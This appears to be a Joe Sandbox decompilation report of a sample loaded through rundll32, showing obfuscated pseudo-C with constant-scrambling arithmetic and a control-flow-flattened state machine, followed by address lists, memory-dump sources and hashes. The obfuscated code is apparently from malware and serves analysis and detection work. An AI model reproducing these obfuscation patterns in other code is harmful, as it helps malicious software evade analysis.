                                                                                                                      				_v244 = _v244 >> 8;
                                                                                                                      				_v244 = _v244 + 0x3d61;
                                                                                                                      				_v244 = _v244 ^ 0x000e9124;
                                                                                                                      				_v308 = 0x462496;
                                                                                                                      				_v308 = _v308 >> 1;
                                                                                                                      				_v308 = _v308 << 8;
                                                                                                                      				_v308 = _v308 + 0xc751;
                                                                                                                      				_v308 = _v308 ^ 0x2311deb1;
                                                                                                                      				_v372 = 0x2d527a;
                                                                                                                      				_v372 = _v372 >> 0xe;
                                                                                                                      				_v372 = _v372 << 0xb;
                                                                                                                      				_t902 = 0x27;
                                                                                                                      				_t803 = 0x29;
                                                                                                                      				_v372 = _v372 * 0x71;
                                                                                                                      				_v372 = _v372 ^ 0x027ecd5f;
                                                                                                                      				_v332 = 0xa669b;
                                                                                                                      				_v332 = _v332 >> 7;
                                                                                                                      				_v332 = _v332 + 0xd2e3;
                                                                                                                      				_v332 = _v332 >> 0xa;
                                                                                                                      				_v332 = _v332 ^ 0x000f2e3e;
                                                                                                                      				_v168 = 0x4e96bd;
                                                                                                                      				_v168 = _v168 << 3;
                                                                                                                      				_v168 = _v168 ^ 0x02701882;
                                                                                                                      				_v112 = 0xaba749;
                                                                                                                      				_v112 = _v112 / _t902;
                                                                                                                      				_v112 = _v112 ^ 0x0003e5b7;
                                                                                                                      				_v176 = 0xf83e47;
                                                                                                                      				_v176 = _v176 + 0xf669;
                                                                                                                      				_v176 = _v176 ^ 0x00f8a104;
                                                                                                                      				_v416 = 0x697041;
                                                                                                                      				_v416 = _v416 | 0x82970019;
                                                                                                                      				_v416 = _v416 / _t803;
                                                                                                                      				_v416 = _v416 + 0xffffd466;
                                                                                                                      				_v416 = _v416 ^ 0x0334f61d;
                                                                                                                      				_v252 = 0x15ebd3;
                                                                                                                      				_v252 = _v252 | 0x6e052c00;
                                                                                                                      				_t804 = 0x67;
                                                                                                                      				_v252 = _v252 / _t804;
                                                                                                                      				_v252 = _v252 ^ 0x0113ba89;
                                                                                                                      				_v276 = 0x344c30;
                                                                                                                      				_v276 = _v276 | 0x5d3660a5;
                                                                                                                      				_v276 = _v276 ^ 0x29f3ee58;
                                                                                                                      				_v276 = _v276 ^ 0x74c4d850;
                                                                                                                      				_v400 = 0xfbb174;
                                                                                                                      				_v400 = _v400 << 7;
                                                                                                                      				_v400 = _v400 ^ 0xf4a56f7f;
                                                                                                                      				_v400 = _v400 + 0xb6a2;
                                                                                                                      				_v400 = _v400 ^ 0x897127f1;
                                                                                                                      				_v408 = 0xeb5219;
                                                                                                                      				_v408 = _v408 + 0x740f;
                                                                                                                      				_v408 = _v408 << 0x10;
                                                                                                                      				_t805 = 0x65;
                                                                                                                      				_v408 = _v408 / _t805;
                                                                                                                      				_v408 = _v408 ^ 0x01f5cec8;
                                                                                                                      				_v268 = 0xb10ed5;
                                                                                                                      				_t806 = 0x6b;
                                                                                                                      				_v268 = _v268 * 0x79;
                                                                                                                      				_v268 = _v268 | 0x0fb1f039;
                                                                                                                      				_v268 = _v268 ^ 0x5fbe4096;
                                                                                                                      				_v132 = 0x68a9ad;
                                                                                                                      				_v132 = _v132 | 0x3a05ff43;
                                                                                                                      				_v132 = _v132 ^ 0x3a6b0a8d;
                                                                                                                      				_v392 = 0x795a70;
                                                                                                                      				_v392 = _v392 >> 0xd;
                                                                                                                      				_v392 = _v392 * 0x48;
                                                                                                                      				_v392 = _v392 / _t806;
                                                                                                                      				_v392 = _v392 ^ 0x000937af;
                                                                                                                      				_v236 = 0x1e45d1;
                                                                                                                      				_t807 = 0x32;
                                                                                                                      				_v236 = _v236 / _t807;
                                                                                                                      				_v236 = _v236 + 0xffffc842;
                                                                                                                      				_v236 = _v236 ^ 0x0007e8a5;
                                                                                                                      				_v228 = 0x827416;
                                                                                                                      				_v228 = _v228 << 4;
                                                                                                                      				_v228 = _v228 ^ 0x0826c6ea;
                                                                                                                      				_v284 = 0xd86f33;
                                                                                                                      				_v284 = _v284 << 0xe;
                                                                                                                      				_v284 = _v284 + 0xcd5c;
                                                                                                                      				_v284 = _v284 ^ 0x1bc78313;
                                                                                                                      				_v380 = 0x51f478;
                                                                                                                      				_v380 = _v380 | 0x2ab41351;
                                                                                                                      				_t808 = 0x6a;
                                                                                                                      				_v380 = _v380 / _t808;
                                                                                                                      				_v380 = _v380 ^ 0x7d9f8aa1;
                                                                                                                      				_v380 = _v380 ^ 0x7df5e8b9;
                                                                                                                      				_v192 = 0x594da7;
                                                                                                                      				_v192 = _v192 + 0xffff4010;
                                                                                                                      				_v192 = _v192 ^ 0x00542d8e;
                                                                                                                      				_v324 = 0x9c8afa;
                                                                                                                      				_t809 = 0x1e;
                                                                                                                      				_v324 = _v324 / _t809;
                                                                                                                      				_v324 = _v324 >> 0xb;
                                                                                                                      				_v324 = _v324 / _t902;
                                                                                                                      				_v324 = _v324 ^ 0x0001b8f0;
                                                                                                                      				_v212 = 0xd229d7;
                                                                                                                      				_v212 = _v212 << 3;
                                                                                                                      				_v212 = _v212 ^ 0x069444ca;
                                                                                                                      				_v288 = 0xa34a44;
                                                                                                                      				_v288 = _v288 ^ 0x8cd8fe8c;
                                                                                                                      				_v288 = _v288 + 0xffff9af8;
                                                                                                                      				_v288 = _v288 ^ 0x8c7655cb;
                                                                                                                      				_v220 = 0x9493db;
                                                                                                                      				_v220 = _v220 | 0x71cebed0;
                                                                                                                      				_v220 = _v220 ^ 0x71dfb10a;
                                                                                                                      				_v224 = 0xf1176b;
                                                                                                                      				_v224 = _v224 + 0xffffb0e2;
                                                                                                                      				_v224 = _v224 ^ 0x00f1becf;
                                                                                                                      				_v352 = 0xae98d2;
                                                                                                                      				_v352 = _v352 + 0xffffb89b;
                                                                                                                      				_v352 = _v352 * 0x11;
                                                                                                                      				_v352 = _v352 + 0x4d1e;
                                                                                                                      				_v352 = _v352 ^ 0x0b9fceb7;
                                                                                                                      				_v180 = 0x84b950;
                                                                                                                      				_v180 = _v180 >> 0xc;
                                                                                                                      				_v180 = _v180 ^ 0x00015b12;
                                                                                                                      				_v360 = 0x38dd65;
                                                                                                                      				_v360 = _v360 << 8;
                                                                                                                      				_v360 = _v360 << 0xb;
                                                                                                                      				_v360 = _v360 + 0xffffe7b0;
                                                                                                                      				_v360 = _v360 ^ 0xeb2159a9;
                                                                                                                      				_v188 = 0x175413;
                                                                                                                      				_v188 = _v188 | 0xeaa62ca7;
                                                                                                                      				_v188 = _v188 ^ 0xeab1c509;
                                                                                                                      				_v196 = 0x89f8f3;
                                                                                                                      				_v196 = _v196 | 0x84cde34a;
                                                                                                                      				_v196 = _v196 ^ 0x84ce03e9;
                                                                                                                      				_v204 = 0xfa0198;
                                                                                                                      				_v204 = _v204 + 0xba3a;
                                                                                                                      				_v204 = _v204 ^ 0x00fbcf1f;
                                                                                                                      				_v368 = 0x243d47;
                                                                                                                      				_v368 = _v368 + 0x6af1;
                                                                                                                      				_v368 = _v368 * 0x18;
                                                                                                                      				_t810 = 0x4c;
                                                                                                                      				_v368 = _v368 * 0x4a;
                                                                                                                      				_v368 = _v368 ^ 0xfe46f3db;
                                                                                                                      				_v164 = 0xfa5634;
                                                                                                                      				_v164 = _v164 << 0xa;
                                                                                                                      				_v164 = _v164 ^ 0xe95805f5;
                                                                                                                      				_v172 = 0x9d86eb;
                                                                                                                      				_v172 = _v172 << 4;
                                                                                                                      				_v172 = _v172 ^ 0x09d75722;
                                                                                                                      				_v256 = 0x88ae25;
                                                                                                                      				_v256 = _v256 + 0xffff9888;
                                                                                                                      				_v256 = _v256 / _t810;
                                                                                                                      				_v256 = _v256 ^ 0x0006cec9;
                                                                                                                      				_v300 = 0x4e3cba;
                                                                                                                      				_v300 = _v300 ^ 0xaec86311;
                                                                                                                      				_v300 = _v300 >> 1;
                                                                                                                      				_v300 = _v300 ^ 0x574be554;
                                                                                                                      				_v156 = 0xcc8ccd;
                                                                                                                      				_v156 = _v156 ^ 0x818e95a6;
                                                                                                                      				_v156 = _v156 ^ 0x8149d9f5;
                                                                                                                      				_v124 = 0x282d8b;
                                                                                                                      				_t811 = 0x63;
                                                                                                                      				_v124 = _v124 / _t811;
                                                                                                                      				_v124 = _v124 ^ 0x0006a08e;
                                                                                                                      				_v356 = 0x703a6e;
                                                                                                                      				_v356 = _v356 << 0xf;
                                                                                                                      				_t812 = 0x17;
                                                                                                                      				_v356 = _v356 / _t812;
                                                                                                                      				_v356 = _v356 * 0x47;
                                                                                                                      				_v356 = _v356 ^ 0x5a27ab7c;
                                                                                                                      				_v184 = 0xabb004;
                                                                                                                      				_v184 = _v184 * 0x62;
                                                                                                                      				_v184 = _v184 ^ 0x41bb11d7;
                                                                                                                      				_v412 = 0xb8c7ed;
                                                                                                                      				_v412 = _v412 * 0x62;
                                                                                                                      				_v412 = _v412 + 0xffff10d9;
                                                                                                                      				_v412 = _v412 * 0x19;
                                                                                                                      				_v412 = _v412 ^ 0xe85860ff;
                                                                                                                      				_v264 = 0x94e0d2;
                                                                                                                      				_v264 = _v264 + 0xffffdaee;
                                                                                                                      				_v264 = _v264 | 0xae8d85da;
                                                                                                                      				_v264 = _v264 ^ 0xae9ce3c7;
                                                                                                                      				_v316 = 0xd1b765;
                                                                                                                      				_v316 = _v316 * 0x77;
                                                                                                                      				_v316 = _v316 + 0xe12c;
                                                                                                                      				_v316 = _v316 + 0x9f51;
                                                                                                                      				_v316 = _v316 ^ 0x617dce52;
                                                                                                                      				_v144 = 0xce6b76;
                                                                                                                      				_v144 = _v144 | 0xba09f1aa;
                                                                                                                      				_v144 = _v144 ^ 0xbac3e068;
                                                                                                                      				_v404 = 0x63322a;
                                                                                                                      				_v404 = _v404 ^ 0x9f0f399b;
                                                                                                                      				_v404 = _v404 * 0x4e;
                                                                                                                      				_v404 = _v404 * 0x4a;
                                                                                                                      				_v404 = _v404 ^ 0x78104cb3;
                                                                                                                      				_v216 = 0xd594b2;
                                                                                                                      				_v216 = _v216 + 0xf571;
                                                                                                                      				_v216 = _v216 ^ 0x00d5cf76;
                                                                                                                      				_v116 = 0xef919a;
                                                                                                                      				_v116 = _v116 << 0xd;
                                                                                                                      				_v116 = _v116 ^ 0xf23180e8;
                                                                                                                      				_v348 = 0xce0390;
                                                                                                                      				_v348 = _v348 + 0xffffa675;
                                                                                                                      				_v348 = _v348 + 0xffff84a1;
                                                                                                                      				_v348 = _v348 ^ 0x00c1e2da;
                                                                                                                      				_v396 = 0x7df7ff;
                                                                                                                      				_v396 = _v396 | 0xfdfffbfc;
                                                                                                                      				_v396 = _v396 ^ 0xfdff4c22;
                                                                                                                      				_v320 = 0x9ca349;
                                                                                                                      				_v320 = _v320 + 0xc568;
                                                                                                                      				_t813 = 7;
                                                                                                                      				_v320 = _v320 * 0x74;
                                                                                                                      				_v320 = _v320 * 0x14;
                                                                                                                      				_v320 = _v320 ^ 0x928c2e40;
                                                                                                                      				_v232 = 0xd54f23;
                                                                                                                      				_v232 = _v232 ^ 0xe15f8e30;
                                                                                                                      				_v232 = _v232 >> 9;
                                                                                                                      				_v232 = _v232 ^ 0x0079ed07;
                                                                                                                      				_v328 = 0x9619e2;
                                                                                                                      				_v328 = _v328 >> 0xf;
                                                                                                                      				_v328 = _v328 + 0xffff55f8;
                                                                                                                      				_v328 = _v328 + 0x27fc;
                                                                                                                      				_v328 = _v328 ^ 0xfffb07bb;
                                                                                                                      				_v388 = 0xf5c662;
                                                                                                                      				_v388 = _v388 + 0xffff192d;
                                                                                                                      				_v388 = _v388 << 6;
                                                                                                                      				_v388 = _v388 ^ 0x81a7a751;
                                                                                                                      				_v388 = _v388 ^ 0xbc9807e7;
                                                                                                                      				_v200 = 0x8d276;
                                                                                                                      				_v200 = _v200 | 0x4d140240;
                                                                                                                      				_v200 = _v200 ^ 0x4d1b4a48;
                                                                                                                      				_v260 = 0x1bde30;
                                                                                                                      				_v260 = _v260 / _t813;
                                                                                                                      				_v260 = _v260 ^ 0x62b9a7e6;
                                                                                                                      				_v260 = _v260 ^ 0x62b42e65;
                                                                                                                      				_v148 = 0xa934f2;
                                                                                                                      				_v148 = _v148 | 0xd141041b;
                                                                                                                      				_v148 = _v148 ^ 0xd1e1ef22;
                                                                                                                      				_v336 = 0xd722ef;
                                                                                                                      				_v336 = _v336 ^ 0xf728ea61;
                                                                                                                      				_v336 = _v336 * 0x41;
                                                                                                                      				_v336 = _v336 + 0xdc3e;
                                                                                                                      				_v336 = _v336 ^ 0xf7ff9a03;
                                                                                                                      				_v344 = 0x7da9d7;
                                                                                                                      				_v344 = _v344 * 0x5b;
                                                                                                                      				_v344 = _v344 >> 5;
                                                                                                                      				_v344 = _v344 ^ 0xb332f6cb;
                                                                                                                      				_v344 = _v344 ^ 0xb251ceff;
                                                                                                                      				_v248 = 0xd93304;
                                                                                                                      				_v248 = _v248 << 5;
                                                                                                                      				_v248 = _v248 * 0xa;
                                                                                                                      				_v248 = _v248 ^ 0x0f7c3f5b;
                                                                                                                      				_v376 = 0xe01f7;
                                                                                                                      				_v376 = _v376 + 0xffff5834;
                                                                                                                      				_v376 = _v376 + 0xffff4130;
                                                                                                                      				_v376 = _v376 ^ 0xd27aacc5;
                                                                                                                      				_v376 = _v376 ^ 0xd2797cee;
                                                                                                                      				_v152 = 0x8f3686;
                                                                                                                      				_v152 = _v152 >> 0xc;
                                                                                                                      				_v152 = _v152 ^ 0x000cec01;
                                                                                                                      				_v384 = 0x1fccfd;
                                                                                                                      				_v384 = _v384 ^ 0xe361d411;
                                                                                                                      				_v384 = _v384 * 0x14;
                                                                                                                      				_v384 = _v384 + 0xb1de;
                                                                                                                      				_v384 = _v384 ^ 0xc5d6ed44;
                                                                                                                      				_v296 = 0x2c9c5a;
                                                                                                                      				_v296 = _v296 ^ 0xe8ab125b;
                                                                                                                      				_v296 = _v296 ^ 0x12f0c7da;
                                                                                                                      				_v296 = _v296 ^ 0xfa7b923a;
                                                                                                                      				_v304 = 0x37d359;
                                                                                                                      				_t903 = 0xcb9b74d;
                                                                                                                      				_v80 = 0x48;
                                                                                                                      				_v304 = _v304 * 0x7e;
                                                                                                                      				_v304 = _v304 | 0xb84966f9;
                                                                                                                      				_v304 = _v304 * 0x68;
                                                                                                                      				_v304 = _v304 ^ 0x2a2d9f44;
                                                                                                                      				_v140 = 0x53fc4;
                                                                                                                      				_v140 = _v140 ^ 0xe3b2dcd9;
                                                                                                                      				_v140 = _v140 ^ 0xe3b5fe0e;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					while(1) {
                                                                                                                      						L2:
                                                                                                                      						_t814 = 0xb5dc217;
                                                                                                                      						_t880 = 0xd2f1df;
                                                                                                                      						do {
                                                                                                                      							while(1) {
                                                                                                                      								L3:
                                                                                                                      								_t915 = _t796 - 0xb1829b2;
                                                                                                                      								if(_t915 > 0) {
                                                                                                                      									break;
                                                                                                                      								}
                                                                                                                      								if(_t915 == 0) {
                                                                                                                      									_push(_v372);
                                                                                                                      									_push(_v308);
                                                                                                                      									_push(0x3415e8);
                                                                                                                      									_t775 = E0034AB66(_v364, _v244, __eflags);
                                                                                                                      									_push(_v176);
                                                                                                                      									_push(_v112);
                                                                                                                      									_push(0x341538);
                                                                                                                      									__eflags = E00350EDA(E0034AB66(_v332, _v168, __eflags), _v120, _v416, _t775,  &_v100, _v252, _v276) - _v160;
                                                                                                                      									_t796 =  ==  ? 0xd2f1df : 0x4c92ee0;
                                                                                                                      									E0034AE03(_v400, _v408, _v268, _t775);
                                                                                                                      									E0034AE03(_v132, _v392, _v236, _t776);
                                                                                                                      									_t900 = _v84;
                                                                                                                      									_t908 = _t908 + 0x3c;
                                                                                                                      									goto L12;
                                                                                                                      								} else {
                                                                                                                      									if(_t796 == _t880) {
                                                                                                                      										_v88 = 0x100;
                                                                                                                      										_t784 = E00345FE2(_v128, 0x100, _v228,  &_v104, _v284, _v380, _v100);
                                                                                                                      										_t908 = _t908 + 0x14;
                                                                                                                      										__eflags = _t784 - _v340;
                                                                                                                      										_t762 = 0x595c7f7;
                                                                                                                      										_t796 =  ==  ? 0x595c7f7 : 0x2464b44;
                                                                                                                      										goto L2;
                                                                                                                      									} else {
                                                                                                                      										if(_t796 == 0x2464b44) {
                                                                                                                      											E00347027(_v304, _v312, _v100, _v140);
                                                                                                                      										} else {
                                                                                                                      											if(_t796 == _t762) {
                                                                                                                      												__eflags = E0035D76F(_v192, _v136, _v104, _v324) - _v108;
                                                                                                                      												_t796 =  ==  ? _t903 : 0xd356110;
                                                                                                                      												while(1) {
                                                                                                                      													L1:
                                                                                                                      													goto L2;
                                                                                                                      												}
                                                                                                                      											} else {
                                                                                                                      												if(_t796 == 0x60e8fa3) {
                                                                                                                      													_t796 = 0xb1829b2;
                                                                                                                      													continue;
                                                                                                                      												} else {
                                                                                                                      													if(_t796 == 0x6aa287e) {
                                                                                                                      														E0035E884(_v388, _v200, _v260, _v92);
                                                                                                                      														_t796 = 0xbb8b89b;
                                                                                                                      														while(1) {
                                                                                                                      															L1:
                                                                                                                      															L2:
                                                                                                                      															_t814 = 0xb5dc217;
                                                                                                                      															_t880 = 0xd2f1df;
                                                                                                                      															goto L3;
                                                                                                                      														}
                                                                                                                      													} else {
                                                                                                                      														_t921 = _t796 - 0x873eae2;
                                                                                                                      														if(_t796 == 0x873eae2) {
                                                                                                                      															_push(_v412);
                                                                                                                      															_push(_v184);
                                                                                                                      															_push(0x341588);
                                                                                                                      															E0035F9E2(_v292, _v264, _v100,  *_t900, _v316, _v124, _v144,  *((intOrPtr*)(_t900 + 4)), _v404, _v216, E0034AB66(_v124, _v356, _t921),  &_v96);
                                                                                                                      															_t796 =  ==  ? 0xb5dc217 : 0xd356110;
                                                                                                                      															E0034AE03(_v116, _v348, _v396, _t790);
                                                                                                                      															_t908 = _t908 + 0x3c;
                                                                                                                      															L12:
                                                                                                                      															_t903 = 0xcb9b74d;
                                                                                                                      															L33:
                                                                                                                      															_t880 = 0xd2f1df;
                                                                                                                      															_t814 = 0xb5dc217;
                                                                                                                      															_t762 = 0x595c7f7;
                                                                                                                      														}
                                                                                                                      														goto L34;
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      								L37:
                                                                                                                      								return _t907;
                                                                                                                      							}
                                                                                                                      							__eflags = _t796 - _t814;
                                                                                                                      							if(_t796 == _t814) {
                                                                                                                      								_t761 = E0034F0A0(_v320, _v232, _v96, _v328,  &_v92, _v104, _v240);
                                                                                                                      								_t908 = _t908 + 0x14;
                                                                                                                      								__eflags = _t761;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									_t796 = 0xbb8b89b;
                                                                                                                      									goto L33;
                                                                                                                      								} else {
                                                                                                                      									_t796 = 0xc32131f;
                                                                                                                      									goto L1;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								__eflags = _t796 - 0xbb8b89b;
                                                                                                                      								if(_t796 == 0xbb8b89b) {
                                                                                                                      									E00354E64(_v148, _v336, _v96, _v344, _v248);
                                                                                                                      									_t908 = _t908 + 0xc;
                                                                                                                      									_t796 = 0xd356110;
                                                                                                                      									while(1) {
                                                                                                                      										L1:
                                                                                                                      										goto L2;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									__eflags = _t796 - 0xc32131f;
                                                                                                                      									if(_t796 == 0xc32131f) {
                                                                                                                      										_t764 = E0034CFCE(_v92);
                                                                                                                      										_t796 = 0x6aa287e;
                                                                                                                      										__eflags = _t764;
                                                                                                                      										_t907 =  !=  ? 1 : _t907;
                                                                                                                      										while(1) {
                                                                                                                      											L1:
                                                                                                                      											goto L2;
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										__eflags = _t796 - _t903;
                                                                                                                      										if(__eflags == 0) {
                                                                                                                      											_push(_v224);
                                                                                                                      											_push(_v220);
                                                                                                                      											_push(0x341588);
                                                                                                                      											_t906 = E0034AB66(_v212, _v288, __eflags);
                                                                                                                      											_v88 = _v80;
                                                                                                                      											_t768 = E00343E2A(_v352, _v180, _t765, _v80, _v360, _v188, _v196, _v204, _v104, _v280,  &_v88, _v80,  &_v76, _v368);
                                                                                                                      											_t908 = _t908 + 0x3c;
                                                                                                                      											__eflags = _t768 - _v272;
                                                                                                                      											if(_t768 != _v272) {
                                                                                                                      												_t796 = 0xd356110;
                                                                                                                      											} else {
                                                                                                                      												_t770 =  *0x365c9c; // 0x0
                                                                                                                      												E0035FD29( &_v68, _v164, _t770 + 0x10, _v172, 0x40);
                                                                                                                      												_t908 = _t908 + 0xc;
                                                                                                                      												_t796 = 0x873eae2;
                                                                                                                      											}
                                                                                                                      											E0034AE03(_v256, _v300, _v156, _t906);
                                                                                                                      											goto L12;
                                                                                                                      										} else {
                                                                                                                      											__eflags = _t796 - 0xd356110;
                                                                                                                      											if(__eflags != 0) {
                                                                                                                      												goto L34;
                                                                                                                      											} else {
                                                                                                                      												E00354E64(_v376, _v152, _v104, _v384, _v296);
                                                                                                                      												_t908 = _t908 + 0xc;
                                                                                                                      												_t796 = 0x2464b44;
                                                                                                                      												while(1) {
                                                                                                                      													L1:
                                                                                                                      													goto L2;
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							goto L37;
                                                                                                                      							L34:
                                                                                                                      						} while (_t796 != 0x4c92ee0);
                                                                                                                      						goto L37;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}

                                                                                                                      0x0034a426
                                                                                                                      0x0034a42a
                                                                                                                      0x0034a432
                                                                                                                      0x0034a43d
                                                                                                                      0x0034a448
                                                                                                                      0x0034a450
                                                                                                                      0x0034a45b
                                                                                                                      0x0034a463
                                                                                                                      0x0034a468
                                                                                                                      0x0034a470
                                                                                                                      0x0034a478
                                                                                                                      0x0034a480
                                                                                                                      0x0034a488
                                                                                                                      0x0034a490
                                                                                                                      0x0034a495
                                                                                                                      0x0034a49d
                                                                                                                      0x0034a4a5
                                                                                                                      0x0034a4b0
                                                                                                                      0x0034a4bb
                                                                                                                      0x0034a4c6
                                                                                                                      0x0034a4da
                                                                                                                      0x0034a4e1
                                                                                                                      0x0034a4ec
                                                                                                                      0x0034a4f7
                                                                                                                      0x0034a502
                                                                                                                      0x0034a50d
                                                                                                                      0x0034a518
                                                                                                                      0x0034a520
                                                                                                                      0x0034a52d
                                                                                                                      0x0034a531
                                                                                                                      0x0034a539
                                                                                                                      0x0034a541
                                                                                                                      0x0034a54e
                                                                                                                      0x0034a552
                                                                                                                      0x0034a557
                                                                                                                      0x0034a55f
                                                                                                                      0x0034a567
                                                                                                                      0x0034a572
                                                                                                                      0x0034a582
                                                                                                                      0x0034a589
                                                                                                                      0x0034a594
                                                                                                                      0x0034a59c
                                                                                                                      0x0034a5a4
                                                                                                                      0x0034a5ac
                                                                                                                      0x0034a5b4
                                                                                                                      0x0034a5bc
                                                                                                                      0x0034a5c7
                                                                                                                      0x0034a5cf
                                                                                                                      0x0034a5da
                                                                                                                      0x0034a5e2
                                                                                                                      0x0034a5ef
                                                                                                                      0x0034a5f3
                                                                                                                      0x0034a5fb
                                                                                                                      0x0034a603
                                                                                                                      0x0034a60e
                                                                                                                      0x0034a619
                                                                                                                      0x0034a624
                                                                                                                      0x0034a62f
                                                                                                                      0x0034a642
                                                                                                                      0x0034a647
                                                                                                                      0x0034a652
                                                                                                                      0x0034a659
                                                                                                                      0x0034a66c
                                                                                                                      0x0034a673
                                                                                                                      0x0034a67e
                                                                                                                      0x0034a689
                                                                                                                      0x0034a694
                                                                                                                      0x0034a69f
                                                                                                                      0x0034a69f
                                                                                                                      0x0034a6a4
                                                                                                                      0x0034a6a4
                                                                                                                      0x0034a6a4
                                                                                                                      0x0034a6a9
                                                                                                                      0x0034a6ae
                                                                                                                      0x0034a6ae
                                                                                                                      0x0034a6ae
                                                                                                                      0x0034a6ae
                                                                                                                      0x0034a6b4
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0034a6ba
                                                                                                                      0x0034a86a
                                                                                                                      0x0034a86e
                                                                                                                      0x0034a880
                                                                                                                      0x0034a885
                                                                                                                      0x0034a88f
                                                                                                                      0x0034a896
                                                                                                                      0x0034a8a8
                                                                                                                      0x0034a8f1
                                                                                                                      0x0034a904
                                                                                                                      0x0034a90b
                                                                                                                      0x0034a923
                                                                                                                      0x0034a928
                                                                                                                      0x0034a92f
                                                                                                                      0x00000000
                                                                                                                      0x0034a6c0
                                                                                                                      0x0034a6c2
                                                                                                                      0x0034a81e
                                                                                                                      0x0034a848
                                                                                                                      0x0034a84f
                                                                                                                      0x0034a85b
                                                                                                                      0x0034a85d
                                                                                                                      0x0034a862
                                                                                                                      0x00000000
                                                                                                                      0x0034a6c8
                                                                                                                      0x0034a6ce
                                                                                                                      0x0034ab52
                                                                                                                      0x0034a6d4
                                                                                                                      0x0034a6d6
                                                                                                                      0x0034a806
                                                                                                                      0x0034a808
                                                                                                                      0x0034a69f
                                                                                                                      0x0034a69f
                                                                                                                      0x00000000
                                                                                                                      0x0034a69f
                                                                                                                      0x0034a6dc
                                                                                                                      0x0034a6e2
                                                                                                                      0x0034a7ce
                                                                                                                      0x00000000
                                                                                                                      0x0034a6e8
                                                                                                                      0x0034a6ee
                                                                                                                      0x0034a7bd
                                                                                                                      0x0034a7c4
                                                                                                                      0x0034a69f
                                                                                                                      0x0034a69f
                                                                                                                      0x0034a6a4
                                                                                                                      0x0034a6a4
                                                                                                                      0x0034a6a9
                                                                                                                      0x00000000
                                                                                                                      0x0034a6a9
                                                                                                                      0x0034a6f4
                                                                                                                      0x0034a6f4
                                                                                                                      0x0034a6fa
                                                                                                                      0x0034a700
                                                                                                                      0x0034a704
                                                                                                                      0x0034a716
                                                                                                                      0x0034a762
                                                                                                                      0x0034a78f
                                                                                                                      0x0034a792
                                                                                                                      0x0034a797
                                                                                                                      0x0034a79a
                                                                                                                      0x0034a79a
                                                                                                                      0x0034ab19
                                                                                                                      0x0034ab19
                                                                                                                      0x0034ab1e
                                                                                                                      0x0034ab23
                                                                                                                      0x0034ab23
                                                                                                                      0x00000000
                                                                                                                      0x0034a6fa
                                                                                                                      0x0034a6ee
                                                                                                                      0x0034a6e2
                                                                                                                      0x0034a6d6
                                                                                                                      0x0034a6ce
                                                                                                                      0x0034a6c2
                                                                                                                      0x0034ab5b
                                                                                                                      0x0034ab65
                                                                                                                      0x0034ab65
                                                                                                                      0x0034a937
                                                                                                                      0x0034a939
                                                                                                                      0x0034aafe
                                                                                                                      0x0034ab03
                                                                                                                      0x0034ab06
                                                                                                                      0x0034ab08
                                                                                                                      0x0034ab14
                                                                                                                      0x00000000
                                                                                                                      0x0034ab0a
                                                                                                                      0x0034ab0a
                                                                                                                      0x00000000
                                                                                                                      0x0034ab0a
                                                                                                                      0x0034a93f
                                                                                                                      0x0034a93f
                                                                                                                      0x0034a945
                                                                                                                      0x0034aabd
                                                                                                                      0x0034aac2
                                                                                                                      0x0034aac5
                                                                                                                      0x0034a69f
                                                                                                                      0x0034a69f
                                                                                                                      0x00000000
                                                                                                                      0x0034a69f
                                                                                                                      0x0034a94b
                                                                                                                      0x0034a94b
                                                                                                                      0x0034a951
                                                                                                                      0x0034aa89
                                                                                                                      0x0034aa90
                                                                                                                      0x0034aa96
                                                                                                                      0x0034aa98
                                                                                                                      0x0034a69f
                                                                                                                      0x0034a69f
                                                                                                                      0x00000000
                                                                                                                      0x0034a69f
                                                                                                                      0x0034a957
                                                                                                                      0x0034a957
                                                                                                                      0x0034a959
                                                                                                                      0x0034a996
                                                                                                                      0x0034a99d
                                                                                                                      0x0034a9b2
                                                                                                                      0x0034a9c6
                                                                                                                      0x0034a9c8
                                                                                                                      0x0034aa1b
                                                                                                                      0x0034aa20
                                                                                                                      0x0034aa23
                                                                                                                      0x0034aa2a
                                                                                                                      0x0034aa5b
                                                                                                                      0x0034aa2c
                                                                                                                      0x0034aa35
                                                                                                                      0x0034aa4c
                                                                                                                      0x0034aa51
                                                                                                                      0x0034aa54
                                                                                                                      0x0034aa54
                                                                                                                      0x0034aa76
                                                                                                                      0x00000000
                                                                                                                      0x0034a95b
                                                                                                                      0x0034a95b
                                                                                                                      0x0034a961
                                                                                                                      0x00000000
                                                                                                                      0x0034a967
                                                                                                                      0x0034a984

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *2c$,$Api$G=$$H$R\$TKW$a=$n:p$pZy$zR-$4r
                                                                                                                      • API String ID: 0-1047287688
                                                                                                                      • Opcode ID: 189d7d8645dacb8bd60bab753af4c0e6233d9b4f53268da3049caa15939bf484
                                                                                                                      • Instruction ID: 87df9d978a7d8be6aade294af5ce3b33fd560326b92207bf112c520f1e1988e0
                                                                                                                      • Opcode Fuzzy Hash: 189d7d8645dacb8bd60bab753af4c0e6233d9b4f53268da3049caa15939bf484
                                                                                                                      • Instruction Fuzzy Hash: 5E82EF71508381CBD379CF65C58AA8BBBE2FBC4304F10891DE6CA8A260D7B59949CF57
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0035D8D7() {
